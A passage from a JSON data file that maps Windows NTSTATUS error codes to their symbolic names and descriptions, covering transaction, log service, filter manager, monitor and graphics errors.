\"STATUS_TRANSACTION_NOT_JOINED\",\n            \"description\": \"The resource manager attempted to prepare a transaction that it has not successfully joined.\"\n        },\n        \"c0190008\": {\n            \"code\": \"STATUS_DIRECTORY_NOT_RM\",\n            \"description\": \"The specified directory does not contain a file system resource manager.\"\n        },\n        \"c019000a\": {\n            \"code\": \"STATUS_TRANSACTIONS_UNSUPPORTED_REMOTE\",\n            \"description\": \"The remote server or share does not support transacted file operations.\"\n        },\n        \"c019000b\": {\n            \"code\": \"STATUS_LOG_RESIZE_INVALID_SIZE\",\n            \"description\": \"The requested log size for the file system resource manager is invalid.\"\n        },\n        \"c019000c\": {\n            \"code\": \"STATUS_REMOTE_FILE_VERSION_MISMATCH\",\n            \"description\": \"The remote server sent mismatching version number or Fid for a file opened with transactions.\"\n        },\n        \"c019000f\": {\n            \"code\": \"STATUS_CRM_PROTOCOL_ALREADY_EXISTS\",\n            \"description\": \"The resource manager tried to register a protocol that already exists.\"\n        },\n        \"c0190010\": {\n            \"code\": \"STATUS_TRANSACTION_PROPAGATION_FAILED\",\n            \"description\": \"The attempt to propagate the transaction failed.\"\n        },\n        \"c0190011\": {\n            \"code\": \"STATUS_CRM_PROTOCOL_NOT_FOUND\",\n            \"description\": \"The requested propagation protocol was not registered as a CRM.\"\n        },\n        \"c0190012\": {\n            \"code\": \"STATUS_TRANSACTION_SUPERIOR_EXISTS\",\n            \"description\": \"The transaction object already has a superior enlistment, and the caller attempted an operation that would have created a new superior. Only a single superior enlistment is allowed.\"\n        },\n        \"c0190013\": {\n            \"code\": \"STATUS_TRANSACTION_REQUEST_NOT_VALID\",\n            \"description\": \"The requested operation is not valid on the transaction object in its current state.\"\n        },\n        \"c0190014\": {\n            \"code\": \"STATUS_TRANSACTION_NOT_REQUESTED\",\n            \"description\": \"The caller has called a response API, but the response is not expected because the transaction manager did not issue the corresponding request to the caller.\"\n        },\n        \"c0190015\": {\n            \"code\": \"STATUS_TRANSACTION_ALREADY_ABORTED\",\n            \"description\": \"It is too late to perform the requested operation, because the transaction has already been aborted.\"\n        },\n        \"c0190016\": {\n            \"code\": \"STATUS_TRANSACTION_ALREADY_COMMITTED\",\n            \"description\": \"It is too late to perform the requested operation, because the transaction has already been committed.\"\n        },\n        \"c0190017\": {\n            \"code\": \"STATUS_TRANSACTION_INVALID_MARSHALL_BUFFER\",\n            \"description\": \"The buffer passed in to NtPushTransaction or NtPullTransaction is not in a valid format.\"\n        },\n        \"c0190018\": {\n            \"code\": \"STATUS_CURRENT_TRANSACTION_NOT_VALID\",\n            \"description\": \"The current transaction context associated with the thread is not a valid handle to a transaction object.\"\n        },\n        \"c0190019\": {\n            \"code\": \"STATUS_LOG_GROWTH_FAILED\",\n            \"description\": \"An attempt to create space in the transactional resource manager's log failed. The failure status has been recorded in the event log.\"\n        },\n        \"c0190021\": {\n            \"code\": \"STATUS_OBJECT_NO_LONGER_EXISTS\",\n            \"description\": \"The object (file, stream, or link) that corresponds to the handle has been deleted by a transaction savepoint rollback.\"\n        },\n        \"c0190022\": {\n            \"code\": \"STATUS_STREAM_MINIVERSION_NOT_FOUND\",\n            \"description\": \"The specified file miniversion was not found for this transacted file open.\"\n        },\n        \"c0190023\": {\n            \"code\": \"STATUS_STREAM_MINIVERSION_NOT_VALID\",\n            \"description\": \"The specified file miniversion was found but has been invalidated. The most likely cause is a transaction savepoint rollback.\"\n        },\n        \"c0190024\": {\n            \"code\": \"STATUS_MINIVERSION_INACCESSIBLE_FROM_SPECIFIED_TRANSACTION\",\n            \"description\": \"A miniversion can be opened only in the context of the transaction that created it.\"\n        },\n        \"c0190025\": {\n            \"code\": \"STATUS_CANT_OPEN_MINIVERSION_WITH_MODIFY_INTENT\",\n            \"description\": \"It is not possible to open a miniversion with modify access.\"\n        },\n        \"c0190026\": {\n            \"code\": \"STATUS_CANT_CREATE_MORE_STREAM_MINIVERSIONS\",\n            \"description\": \"It is not possible to create any more miniversions for this stream.\"\n        },\n        \"c0190028\": {\n            \"code\": \"STATUS_HANDLE_NO_LONGER_VALID\",\n            \"description\": \"The handle has been invalidated by a transaction. The most likely cause is the presence of memory mapping on a file or an open handle when the transaction ended or rolled back to savepoint.\"\n        },\n        \"c0190030\": {\n            \"code\": \"STATUS_LOG_CORRUPTION_DETECTED\",\n            \"description\": \"The log data is corrupt.\"\n        },\n        \"c0190032\": {\n            \"code\": \"STATUS_RM_DISCONNECTED\",\n            \"description\": \"The transaction outcome is unavailable because the resource manager responsible for it is disconnected.\"\n        },\n        \"c0190033\": {\n            \"code\": \"STATUS_ENLISTMENT_NOT_SUPERIOR\",\n            \"description\": \"The request was rejected because the enlistment in question is not a superior enlistment.\"\n        },\n        \"c0190036\": {\n            \"code\": \"STATUS_FILE_IDENTITY_NOT_PERSISTENT\",\n            \"description\": \"The file cannot be opened in a transaction because its identity depends on the outcome of an unresolved transaction.\"\n        },\n        \"c0190037\": {\n            \"code\": \"STATUS_CANT_BREAK_TRANSACTIONAL_DEPENDENCY\",\n            \"description\": \"The operation cannot be performed because another transaction is depending on this property not changing.\"\n        },\n        \"c0190038\": {\n            \"code\": \"STATUS_CANT_CROSS_RM_BOUNDARY\",\n            \"description\": \"The operation would involve a single file with two transactional resource managers and is, therefore, not allowed.\"\n        },\n        \"c0190039\": {\n            \"code\": \"STATUS_TXF_DIR_NOT_EMPTY\",\n            \"description\": \"The $Txf directory must be empty for this operation to succeed.\"\n        },\n        \"c019003a\": {\n            \"code\": \"STATUS_INDOUBT_TRANSACTIONS_EXIST\",\n            \"description\": \"The operation would leave a transactional resource manager in an inconsistent state and is therefore not allowed.\"\n        },\n        \"c019003b\": {\n            \"code\": \"STATUS_TM_VOLATILE\",\n            \"description\": \"The operation could not be completed because the transaction manager does not have a log.\"\n        },\n        \"c019003c\": {\n            \"code\": \"STATUS_ROLLBACK_TIMER_EXPIRED\",\n            \"description\": \"A rollback could not be scheduled because a previously scheduled rollback has already executed or been queued for execution.\"\n        },\n        \"c019003d\": {\n            \"code\": \"STATUS_TXF_ATTRIBUTE_CORRUPT\",\n            \"description\": \"The transactional metadata attribute on the file or directory %hs is corrupt and unreadable.\"\n        },\n        \"c019003e\": {\n            \"code\": \"STATUS_EFS_NOT_ALLOWED_IN_TRANSACTION\",\n            \"description\": \"The encryption operation could not be completed because a transaction is active.\"\n        },\n        \"c019003f\": {\n            \"code\": \"STATUS_TRANSACTIONAL_OPEN_NOT_ALLOWED\",\n            \"description\": \"This object is not allowed to be opened in a transaction.\"\n        },\n        \"c0190040\": {\n            \"code\": \"STATUS_TRANSACTED_MAPPING_UNSUPPORTED_REMOTE\",\n            \"description\": \"Memory mapping (creating a mapped section) a remote file under a transaction is not supported.\"\n        },\n        \"c0190043\": {\n            \"code\": \"STATUS_TRANSACTION_REQUIRED_PROMOTION\",\n            \"description\": \"Promotion was required to allow the resource manager to enlist, but the transaction was set to disallow it.\"\n        },\n        \"c0190044\": {\n            \"code\": \"STATUS_CANNOT_EXECUTE_FILE_IN_TRANSACTION\",\n            \"description\": \"This file is open for modification in an unresolved transaction and can be opened for execute only by a transacted reader.\"\n        },\n        \"c0190045\": {\n            \"code\": \"STATUS_TRANSACTIONS_NOT_FROZEN\",\n            \"description\": \"The request to thaw frozen transactions was ignored because transactions were not previously frozen.\"\n        },\n        \"c0190046\": {\n            \"code\": \"STATUS_TRANSACTION_FREEZE_IN_PROGRESS\",\n            \"description\": \"Transactions cannot be frozen because a freeze is already in progress.\"\n        },\n        \"c0190047\": {\n            \"code\": \"STATUS_NOT_SNAPSHOT_VOLUME\",\n            \"description\": \"The target volume is not a snapshot volume. This operation is valid only on a volume mounted as a snapshot.\"\n        },\n        \"c0190048\": {\n            \"code\": \"STATUS_NO_SAVEPOINT_WITH_OPEN_FILES\",\n            \"description\": \"The savepoint operation failed because files are open on the transaction, which is not permitted.\"\n        },\n        \"c0190049\": {\n            \"code\": \"STATUS_SPARSE_NOT_ALLOWED_IN_TRANSACTION\",\n            \"description\": \"The sparse operation could not be completed because a transaction is active on the file.\"\n        },\n        \"c019004a\": {\n            \"code\": \"STATUS_TM_IDENTITY_MISMATCH\",\n            \"description\": \"The call to create a transaction manager object failed because the Tm Identity that is stored in the log file does not match the Tm Identity that was passed in as an argument.\"\n        },\n        \"c019004b\": {\n            \"code\": \"STATUS_FLOATED_SECTION\",\n            \"description\": \"I/O was attempted on a section object that has been floated as a result of a transaction ending. There is no valid data.\"\n        },\n        \"c019004c\": {\n            \"code\": \"STATUS_CANNOT_ACCEPT_TRANSACTED_WORK\",\n            \"description\": \"The transactional resource manager cannot currently accept transacted work due to a transient condition, such as low resources.\"\n        },\n        \"c019004d\": {\n            \"code\": \"STATUS_CANNOT_ABORT_TRANSACTIONS\",\n            \"description\": \"The transactional resource manager had too many transactions outstanding that could not be aborted. The transactional resource manager has been shut down.\"\n        },\n        \"c019004e\": {\n            \"code\": \"STATUS_TRANSACTION_NOT_FOUND\",\n            \"description\": \"The specified transaction was unable to be opened because it was not found.\"\n        },\n        \"c019004f\": {\n            \"code\": \"STATUS_RESOURCEMANAGER_NOT_FOUND\",\n            \"description\": \"The specified resource manager was unable to be opened because it was not found.\"\n        },\n        \"c0190050\": {\n            \"code\": \"STATUS_ENLISTMENT_NOT_FOUND\",\n            \"description\": \"The specified enlistment was unable to be opened because it was not found.\"\n        },\n        \"c0190051\": {\n            \"code\": \"STATUS_TRANSACTIONMANAGER_NOT_FOUND\",\n            \"description\": \"The specified transaction manager was unable to be opened because it was not found.\"\n        },\n        \"c0190052\": {\n            \"code\": \"STATUS_TRANSACTIONMANAGER_NOT_ONLINE\",\n            \"description\": \"The specified resource manager was unable to create an enlistment because its associated transaction manager is not online.\"\n        },\n        \"c0190053\": {\n            \"code\": \"STATUS_TRANSACTIONMANAGER_RECOVERY_NAME_COLLISION\",\n            \"description\": \"The specified transaction manager was unable to create the objects contained in its log file in the Ob namespace. Therefore, the transaction manager was unable to recover.\"\n        },\n        \"c0190054\": {\n            \"code\": \"STATUS_TRANSACTION_NOT_ROOT\",\n            \"description\": \"The call to create a superior enlistment on this transaction object could not be completed because the transaction object specified for the enlistment is a subordinate branch of the transaction. Only the root of the transaction can be enlisted as a superior.\"\n        },\n        \"c0190055\": {\n            \"code\": \"STATUS_TRANSACTION_OBJECT_EXPIRED\",\n            \"description\": \"Because the associated transaction manager or resource manager has been closed, the handle is no longer valid.\"\n        },\n        \"c0190056\": {\n            \"code\": \"STATUS_COMPRESSION_NOT_ALLOWED_IN_TRANSACTION\",\n            \"description\": \"The compression operation could not be completed because a transaction is active on the file.\"\n        },\n        \"c0190057\": {\n            \"code\": \"STATUS_TRANSACTION_RESPONSE_NOT_ENLISTED\",\n            \"description\": \"The specified operation could not be performed on this superior enlistment because the enlistment was not created with the corresponding completion response in the NotificationMask.\"\n        },\n        \"c0190058\": {\n            \"code\": \"STATUS_TRANSACTION_RECORD_TOO_LONG\",\n            \"description\": \"The specified operation could not be performed because the record to be logged was too long. This can occur because either there are too many enlistments on this transaction or the combined RecoveryInformation being logged on behalf of those enlistments is too long.\"\n        },\n        \"c0190059\": {\n            \"code\": \"STATUS_NO_LINK_TRACKING_IN_TRANSACTION\",\n            \"description\": \"The link-tracking operation could not be completed because a transaction is active.\"\n        },\n        \"c019005a\": {\n            \"code\": \"STATUS_OPERATION_NOT_SUPPORTED_IN_TRANSACTION\",\n            \"description\": \"This operation cannot be performed in a transaction.\"\n        },\n        \"c019005b\": {\n            \"code\": \"STATUS_TRANSACTION_INTEGRITY_VIOLATED\",\n            \"description\": \"The kernel transaction manager had to abort or forget the transaction because it blocked forward progress.\"\n        },\n        \"c0190060\": {\n            \"code\": \"STATUS_EXPIRED_HANDLE\",\n            \"description\": \"The handle is no longer properly associated with its transaction.  It might have been opened in a transactional resource manager that was subsequently forced to restart.  Please close the handle and open a new one.\"\n        },\n        \"c0190061\": {\n            \"code\": \"STATUS_TRANSACTION_NOT_ENLISTED\",\n            \"description\": \"The specified operation could not be performed because the resource manager is not enlisted in the transaction.\"\n        },\n        \"c01a0001\": {\n            \"code\": \"STATUS_LOG_SECTOR_INVALID\",\n            \"description\": \"The log service found an invalid log sector.\"\n        },\n        \"c01a0002\": {\n            \"code\": \"STATUS_LOG_SECTOR_PARITY_INVALID\",\n            \"description\": \"The log service encountered a log sector with invalid block parity.\"\n        },\n        \"c01a0003\": {\n            \"code\": \"STATUS_LOG_SECTOR_REMAPPED\",\n            \"description\": \"The log service encountered a remapped log sector.\"\n        },\n        \"c01a0004\": {\n            \"code\": \"STATUS_LOG_BLOCK_INCOMPLETE\",\n            \"description\": \"The log service encountered a partial or incomplete log block.\"\n        },\n        \"c01a0005\": {\n            \"code\": \"STATUS_LOG_INVALID_RANGE\",\n            \"description\": \"The log service encountered an attempt to access data outside the active log range.\"\n        },\n        \"c01a0006\": {\n            \"code\": \"STATUS_LOG_BLOCKS_EXHAUSTED\",\n            \"description\": \"The log service user-log marshaling buffers are exhausted.\"\n        },\n        \"c01a0007\": {\n            \"code\": \"STATUS_LOG_READ_CONTEXT_INVALID\",\n            \"description\": \"The log service encountered an attempt to read from a marshaling area with an invalid read context.\"\n        },\n        \"c01a0008\": {\n            \"code\": \"STATUS_LOG_RESTART_INVALID\",\n            \"description\": \"The log service encountered an invalid log restart area.\"\n        },\n        \"c01a0009\": {\n            \"code\": \"STATUS_LOG_BLOCK_VERSION\",\n            \"description\": \"The log service encountered an invalid log block version.\"\n        },\n        \"c01a000a\": {\n            \"code\": \"STATUS_LOG_BLOCK_INVALID\",\n            \"description\": \"The log service encountered an invalid log block.\"\n        },\n        \"c01a000b\": {\n            \"code\": \"STATUS_LOG_READ_MODE_INVALID\",\n            \"description\": \"The log service encountered an attempt to read the log with an invalid read mode.\"\n        },\n        \"c01a000d\": {\n            \"code\": \"STATUS_LOG_METADATA_CORRUPT\",\n            \"description\": \"The log service encountered a corrupted metadata file.\"\n        },\n        \"c01a000e\": {\n            \"code\": \"STATUS_LOG_METADATA_INVALID\",\n            \"description\": \"The log service encountered a metadata file that could not be created by the log file system.\"\n        },\n        \"c01a000f\": {\n            \"code\": \"STATUS_LOG_METADATA_INCONSISTENT\",\n            \"description\": \"The log service encountered a metadata file with inconsistent data.\"\n        },\n        \"c01a0010\": {\n            \"code\": \"STATUS_LOG_RESERVATION_INVALID\",\n            \"description\": \"The log service encountered an attempt to erroneously allocate or dispose reservation space.\"\n        },\n        \"c01a0011\": {\n            \"code\": \"STATUS_LOG_CANT_DELETE\",\n            \"description\": \"The log service cannot delete the log file or the file system container.\"\n        },\n        \"c01a0012\": {\n            \"code\": \"STATUS_LOG_CONTAINER_LIMIT_EXCEEDED\",\n            \"description\": \"The log service has reached the maximum allowable containers allocated to a log file.\"\n        },\n        \"c01a0013\": {\n            \"code\": \"STATUS_LOG_START_OF_LOG\",\n            \"description\": \"The log service has attempted to read or write backward past the start of the log.\"\n        },\n        \"c01a0014\": {\n            \"code\": \"STATUS_LOG_POLICY_ALREADY_INSTALLED\",\n            \"description\": \"The log policy could not be installed because a policy of the same type is already present.\"\n        },\n        \"c01a0015\": {\n            \"code\": \"STATUS_LOG_POLICY_NOT_INSTALLED\",\n            \"description\": \"The log policy in question was not installed at the time of the request.\"\n        },\n        \"c01a0016\": {\n            \"code\": \"STATUS_LOG_POLICY_INVALID\",\n            \"description\": \"The installed set of policies on the log is invalid.\"\n        },\n        \"c01a0017\": {\n            \"code\": \"STATUS_LOG_POLICY_CONFLICT\",\n            \"description\": \"A policy on the log in question prevented the operation from completing.\"\n        },\n        \"c01a0018\": {\n            \"code\": \"STATUS_LOG_PINNED_ARCHIVE_TAIL\",\n            \"description\": \"The log space cannot be reclaimed because the log is pinned by the archive tail.\"\n        },\n        \"c01a0019\": {\n            \"code\": \"STATUS_LOG_RECORD_NONEXISTENT\",\n            \"description\": \"The log record is not a record in the log file.\"\n        },\n        \"c01a001a\": {\n            \"code\": \"STATUS_LOG_RECORDS_RESERVED_INVALID\",\n            \"description\": \"The number of reserved log records or the adjustment of the number of reserved log records is invalid.\"\n        },\n        \"c01a001b\": {\n            \"code\": \"STATUS_LOG_SPACE_RESERVED_INVALID\",\n            \"description\": \"The reserved log space or the adjustment of the log space is invalid.\"\n        },\n        \"c01a001c\": {\n            \"code\": \"STATUS_LOG_TAIL_INVALID\",\n            \"description\": \"A new or existing archive tail or the base of the active log is invalid.\"\n        },\n        \"c01a001d\": {\n            \"code\": \"STATUS_LOG_FULL\",\n            \"description\": \"The log space is exhausted.\"\n        },\n        \"c01a001e\": {\n            \"code\": \"STATUS_LOG_MULTIPLEXED\",\n            \"description\": \"The log is multiplexed; no direct writes to the physical log are allowed.\"\n        },\n        \"c01a001f\": {\n            \"code\": \"STATUS_LOG_DEDICATED\",\n            \"description\": \"The operation failed because the log is dedicated.\"\n        },\n        \"c01a0020\": {\n            \"code\": \"STATUS_LOG_ARCHIVE_NOT_IN_PROGRESS\",\n            \"description\": \"The operation requires an archive context.\"\n        },\n        \"c01a0021\": {\n            \"code\": \"STATUS_LOG_ARCHIVE_IN_PROGRESS\",\n            \"description\": \"Log archival is in progress.\"\n        },\n        \"c01a0022\": {\n            \"code\": \"STATUS_LOG_EPHEMERAL\",\n            \"description\": \"The operation requires a nonephemeral log, but the log is ephemeral.\"\n        },\n        \"c01a0023\": {\n            \"code\": \"STATUS_LOG_NOT_ENOUGH_CONTAINERS\",\n            \"description\": \"The log must have at least two containers before it can be read from or written to.\"\n        },\n        \"c01a0024\": {\n            \"code\": \"STATUS_LOG_CLIENT_ALREADY_REGISTERED\",\n            \"description\": \"A log client has already registered on the stream.\"\n        },\n        \"c01a0025\": {\n            \"code\": \"STATUS_LOG_CLIENT_NOT_REGISTERED\",\n            \"description\": \"A log client has not been registered on the stream.\"\n        },\n        \"c01a0026\": {\n            \"code\": \"STATUS_LOG_FULL_HANDLER_IN_PROGRESS\",\n            \"description\": \"A request has already been made to handle the log full condition.\"\n        },\n        \"c01a0027\": {\n            \"code\": \"STATUS_LOG_CONTAINER_READ_FAILED\",\n            \"description\": \"The log service encountered an error when attempting to read from a log container.\"\n        },\n        \"c01a0028\": {\n            \"code\": \"STATUS_LOG_CONTAINER_WRITE_FAILED\",\n            \"description\": \"The log service encountered an error when attempting to write to a log container.\"\n        },\n        \"c01a0029\": {\n            \"code\": \"STATUS_LOG_CONTAINER_OPEN_FAILED\",\n            \"description\": \"The log service encountered an error when attempting to open a log container.\"\n        },\n        \"c01a002a\": {\n            \"code\": \"STATUS_LOG_CONTAINER_STATE_INVALID\",\n            \"description\": \"The log service encountered an invalid container state when attempting a requested action.\"\n        },\n        \"c01a002b\": {\n            \"code\": \"STATUS_LOG_STATE_INVALID\",\n            \"description\": \"The log service is not in the correct state to perform a requested action.\"\n        },\n        \"c01a002c\": {\n            \"code\": \"STATUS_LOG_PINNED\",\n            \"description\": \"The log space cannot be reclaimed because the log is pinned.\"\n        },\n        \"c01a002d\": {\n            \"code\": \"STATUS_LOG_METADATA_FLUSH_FAILED\",\n            \"description\": \"The log metadata flush failed.\"\n        },\n        \"c01a002e\": {\n            \"code\": \"STATUS_LOG_INCONSISTENT_SECURITY\",\n            \"description\": \"Security on the log and its containers is inconsistent.\"\n        },\n        \"c01a002f\": {\n            \"code\": \"STATUS_LOG_APPENDED_FLUSH_FAILED\",\n            \"description\": \"Records were appended to the log or reservation changes were made, but the log could not be flushed.\"\n        },\n        \"c01a0030\": {\n            \"code\": \"STATUS_LOG_PINNED_RESERVATION\",\n            \"description\": \"The log is pinned due to reservation consuming most of the log space. Free some reserved records to make space available.\"\n        },\n        \"c01b00ea\": {\n            \"code\": \"STATUS_VIDEO_HUNG_DISPLAY_DRIVER_THREAD\",\n            \"description\": \"{Display Driver Stopped Responding} The %hs display driver has stopped working normally. Save your work and reboot the system to restore full display functionality. The next time you reboot the computer, a dialog box will allow you to upload data about this failure to Microsoft.\"\n        },\n        \"c01c0001\": {\n            \"code\": \"STATUS_FLT_NO_HANDLER_DEFINED\",\n            \"description\": \"A handler was not defined by the filter for this operation.\"\n        },\n        \"c01c0002\": {\n            \"code\": \"STATUS_FLT_CONTEXT_ALREADY_DEFINED\",\n            \"description\": \"A context is already defined for this object.\"\n        },\n        \"c01c0003\": {\n            \"code\": \"STATUS_FLT_INVALID_ASYNCHRONOUS_REQUEST\",\n            \"description\": \"Asynchronous requests are not valid for this operation.\"\n        },\n        \"c01c0004\": {\n            \"code\": \"STATUS_FLT_DISALLOW_FAST_IO\",\n            \"description\": \"This is an internal error code used by the filter manager to determine if a fast I/O operation should be forced down the input/output request packet (IRP) path. Minifilters should never return this value.\"\n        },\n        \"c01c0005\": {\n            \"code\": \"STATUS_FLT_INVALID_NAME_REQUEST\",\n            \"description\": \"An invalid name request was made. The name requested cannot be retrieved at this time.\"\n        },\n        \"c01c0006\": {\n            \"code\": \"STATUS_FLT_NOT_SAFE_TO_POST_OPERATION\",\n            \"description\": \"Posting this operation to a worker thread for further processing is not safe at this time because it could lead to a system deadlock.\"\n        },\n        \"c01c0007\": {\n            \"code\": \"STATUS_FLT_NOT_INITIALIZED\",\n            \"description\": \"The Filter Manager was not initialized when a filter tried to register. Make sure that the Filter Manager is loaded as a driver.\"\n        },\n        \"c01c0008\": {\n            \"code\": \"STATUS_FLT_FILTER_NOT_READY\",\n            \"description\": \"The filter is not ready for attachment to volumes because it has not finished initializing (FltStartFiltering has not been called).\"\n        },\n        \"c01c0009\": {\n            \"code\": \"STATUS_FLT_POST_OPERATION_CLEANUP\",\n            \"description\": \"The filter must clean up any operation-specific context at this time because it is being removed from the system before the operation is completed by the lower drivers.\"\n        },\n        \"c01c000a\": {\n            \"code\": \"STATUS_FLT_INTERNAL_ERROR\",\n            \"description\": \"The Filter Manager had an internal error from which it cannot recover; therefore, the operation has failed. This is usually the result of a filter returning an invalid value from a pre-operation callback.\"\n        },\n        \"c01c000b\": {\n            \"code\": \"STATUS_FLT_DELETING_OBJECT\",\n            \"description\": \"The object specified for this action is in the process of being deleted; therefore, the action requested cannot be completed at this time.\"\n        },\n        \"c01c000c\": {\n            \"code\": \"STATUS_FLT_MUST_BE_NONPAGED_POOL\",\n            \"description\": \"A nonpaged pool must be used for this type of context.\"\n        },\n        \"c01c000d\": {\n            \"code\": \"STATUS_FLT_DUPLICATE_ENTRY\",\n            \"description\": \"A duplicate handler definition has been provided for an operation.\"\n        },\n        \"c01c000e\": {\n            \"code\": \"STATUS_FLT_CBDQ_DISABLED\",\n            \"description\": \"The callback data queue has been disabled.\"\n        },\n        \"c01c000f\": {\n            \"code\": \"STATUS_FLT_DO_NOT_ATTACH\",\n            \"description\": \"Do not attach the filter to the volume at this time.\"\n        },\n        \"c01c0010\": {\n            \"code\": \"STATUS_FLT_DO_NOT_DETACH\",\n            \"description\": \"Do not detach the filter from the volume at this time.\"\n        },\n        \"c01c0011\": {\n            \"code\": \"STATUS_FLT_INSTANCE_ALTITUDE_COLLISION\",\n            \"description\": \"An instance already exists at this altitude on the volume specified.\"\n        },\n        \"c01c0012\": {\n            \"code\": \"STATUS_FLT_INSTANCE_NAME_COLLISION\",\n            \"description\": \"An instance already exists with this name on the volume specified.\"\n        },\n        \"c01c0013\": {\n            \"code\": \"STATUS_FLT_FILTER_NOT_FOUND\",\n            \"description\": \"The system could not find the filter specified.\"\n        },\n        \"c01c0014\": {\n            \"code\": \"STATUS_FLT_VOLUME_NOT_FOUND\",\n            \"description\": \"The system could not find the volume specified.\"\n        },\n        \"c01c0015\": {\n            \"code\": \"STATUS_FLT_INSTANCE_NOT_FOUND\",\n            \"description\": \"The system could not find the instance specified.\"\n        },\n        \"c01c0016\": {\n            \"code\": \"STATUS_FLT_CONTEXT_ALLOCATION_NOT_FOUND\",\n            \"description\": \"No registered context allocation definition was found for the given request.\"\n        },\n        \"c01c0017\": {\n            \"code\": \"STATUS_FLT_INVALID_CONTEXT_REGISTRATION\",\n            \"description\": \"An invalid parameter was specified during context registration.\"\n        },\n        \"c01c0018\": {\n            \"code\": \"STATUS_FLT_NAME_CACHE_MISS\",\n            \"description\": \"The name requested was not found in the Filter Manager name cache and could not be retrieved from the file system.\"\n        },\n        \"c01c0019\": {\n            \"code\": \"STATUS_FLT_NO_DEVICE_OBJECT\",\n            \"description\": \"The requested device object does not exist for the given volume.\"\n        },\n        \"c01c001a\": {\n            \"code\": \"STATUS_FLT_VOLUME_ALREADY_MOUNTED\",\n            \"description\": \"The specified volume is already mounted.\"\n        },\n        \"c01c001b\": {\n            \"code\": \"STATUS_FLT_ALREADY_ENLISTED\",\n            \"description\": \"The specified transaction context is already enlisted in a transaction.\"\n        },\n        \"c01c001c\": {\n            \"code\": \"STATUS_FLT_CONTEXT_ALREADY_LINKED\",\n            \"description\": \"The specified context is already attached to another object.\"\n        },\n        \"c01c0020\": {\n            \"code\": \"STATUS_FLT_NO_WAITER_FOR_REPLY\",\n            \"description\": \"No waiter is present for the filter's reply to this message.\"\n        },\n        \"c01d0001\": {\n            \"code\": \"STATUS_MONITOR_NO_DESCRIPTOR\",\n            \"description\": \"A monitor descriptor could not be obtained.\"\n        },\n        \"c01d0002\": {\n            \"code\": \"STATUS_MONITOR_UNKNOWN_DESCRIPTOR_FORMAT\",\n            \"description\": \"This release does not support the format of the obtained monitor descriptor.\"\n        },\n        \"c01d0003\": {\n            \"code\": \"STATUS_MONITOR_INVALID_DESCRIPTOR_CHECKSUM\",\n            \"description\": \"The checksum of the obtained monitor descriptor is invalid.\"\n        },\n        \"c01d0004\": {\n            \"code\": \"STATUS_MONITOR_INVALID_STANDARD_TIMING_BLOCK\",\n            \"description\": \"The monitor descriptor contains an invalid standard timing block.\"\n        },\n        \"c01d0005\": {\n            \"code\": \"STATUS_MONITOR_WMI_DATABLOCK_REGISTRATION_FAILED\",\n            \"description\": \"WMI data-block registration failed for one of the MSMonitorClass WMI subclasses.\"\n        },\n        \"c01d0006\": {\n            \"code\": \"STATUS_MONITOR_INVALID_SERIAL_NUMBER_MONDSC_BLOCK\",\n            \"description\": \"The provided monitor descriptor block is either corrupted or does not contain the monitor's detailed serial number.\"\n        },\n        \"c01d0007\": {\n            \"code\": \"STATUS_MONITOR_INVALID_USER_FRIENDLY_MONDSC_BLOCK\",\n            \"description\": \"The provided monitor descriptor block is either corrupted or does not contain the monitor's user-friendly name.\"\n        },\n        \"c01d0008\": {\n            \"code\": \"STATUS_MONITOR_NO_MORE_DESCRIPTOR_DATA\",\n            \"description\": \"There is no monitor descriptor data at the specified (offset or size) region.\"\n        },\n        \"c01d0009\": {\n            \"code\": \"STATUS_MONITOR_INVALID_DETAILED_TIMING_BLOCK\",\n            \"description\": \"The monitor descriptor contains an invalid detailed timing block.\"\n        },\n        \"c01d000a\": {\n            \"code\": \"STATUS_MONITOR_INVALID_MANUFACTURE_DATE\",\n            \"description\": \"Monitor descriptor contains invalid manufacture date.\"\n        },\n        \"c01e0000\": {\n            \"code\": \"STATUS_GRAPHICS_NOT_EXCLUSIVE_MODE_OWNER\",\n            \"description\": \"Exclusive mode ownership is needed to create an unmanaged primary allocation.\"\n        },\n        \"c01e0001\": {\n            \"code\": \"STATUS_GRAPHICS_INSUFFICIENT_DMA_BUFFER\",\n            \"description\": \"The driver needs more DMA buffer space to complete the requested operation.\"\n        },\n        \"c01e0002\": {\n            \"code\": \"STATUS_GRAPHICS_INVALID_DISPLAY_ADAPTER\",\n            \"description\": \"The specified display adapter handle is invalid.\"\n        },\n        \"c01e0003\": {\n            \"code\": \"STATUS_GRAPHICS_ADAPTER_WAS_RESET\",\n            \"description\": \"The specified display adapter and all of its state have been reset.\"\n        },\n        \"c01e0004\": {\n            \"code\": \"STATUS_GRAPHICS_INVALID_DRIVER_MODEL\",\n            \"description\": \"The driver stack does not match the expected driver model.\"\n        },\n        \"c01e0005\": {\n            \"code\": \"STATUS_GRAPHICS_PRESENT_MODE_CHANGED\",\n            \"description\": \"Present happened but ended up into the changed desktop mode.\"\n        },\n        \"c01e0006\": {\n            \"code\": \"STATUS_GRAPHICS_PRESENT_OCCLUDED\",\n            \"description\": \"Nothing to present due to desktop occlusion.\"\n        },\n        \"c01e0007\": {\n            \"code\": \"STATUS_GRAPHICS_PRESENT_DENIED\",\n            \"description\": \"Not able to present due to denial of desktop access.\"\n        },\n        \"c01e0008\": {\n            \"code\": \"STATUS_GRAPHICS_CANNOTCOLORCONVERT\",\n            \"description\": \"Not able to present with color conversion.\"\n        },\n        \"c01e000b\": {\n            \"code\": \"STATUS_GRAPHICS_PRESENT_REDIRECTION_DISABLED\",\n            \"description\": \"Present redirection is disabled (desktop windowing management subsystem is off).\"\n        },\n        \"c01e000c\": {\n            \"code\": \"STATUS_GRAPHICS_PRESENT_UNOCCLUDED\",\n            \"description\": \"Previous exclusive VidPn source owner has released its ownership\"\n        },\n        \"c01e0100\": {\n            \"code\": \"STATUS_GRAPHICS_NO_VIDEO_MEMORY\",\n            \"description\": \"Not enough video memory is available to complete the operation.\"\n        },\n        \"c01e0101\": {\n            \"code\": \"STATUS_GRAPHICS_CANT_LOCK_MEMORY\",\n            \"description\": \"Could not probe and lock the underlying memory of an allocation.\"\n        },\n        \"c01e0102\": {\n            \"code\": \"STATUS_GRAPHICS_ALLOCATION_BUSY\",\n            \"description\": \"The allocation is currently busy.\"\n        },\n        \"c01e0103\": {\n            \"code\": \"STATUS_GRAPHICS_TOO_MANY_REFERENCES\",\n            \"description\": \"An object being referenced has already reached the maximum reference count and cannot be referenced further.\"\n        },\n        \"c01e0104\": {\n            \"code\": \"STATUS_GRAPHICS_TRY_AGAIN_LATER\",\n            \"description\": \"A problem could not be solved due to an existing condition. Try again later.\"\n        },\n        \"c01e0105\": {\n            \"code\": \"STATUS_GRAPHICS_TRY_AGAIN_NOW\",\n            